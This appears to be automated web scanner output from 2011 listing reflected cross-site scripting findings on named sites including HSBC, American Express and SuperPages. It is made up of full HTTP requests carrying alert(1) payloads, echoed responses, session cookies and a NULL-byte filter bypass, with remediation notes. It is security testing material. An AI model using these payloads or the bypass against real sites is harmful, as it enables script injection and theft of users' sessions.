GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:55 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:06:56GMT Content-Length: 60810 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages"> ...[SNIP]...
4.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:06 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:06GMT Content-Length: 59798 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i ...[SNIP]... <h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1> ...[SNIP]...
The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1 Host: www.thehealthreport.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <!-- saved from url=(0034)http://www.channel5healthnews.net/ --> <H ...[SNIP]... <A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp" target=_blank> ...[SNIP]...
The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:06 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:07 GMT Vary: User-Agent,Cookie Content-Length: 5895 Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content=" ...[SNIP]... <script language="javascript"> var date = new Date(); date.setTime(date.getTime()+(365*24*60*60*1000)); var expires = "; expires="+date.toGMTString(); document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:39 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:39 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:10 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:10 GMT Vary: User-Agent,Cookie Content-Length: 27260 Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:11 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:11 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:12 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:24 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b"; </script> ...[SNIP]...
4.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1"; </script> ...[SNIP]...
The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:11 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71876
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89"; </script> ...[SNIP]...
4.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
4.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:19 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb; var sj_modalToOpen = "null"; var sj_servername = "www201.americanexpress.com"; </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
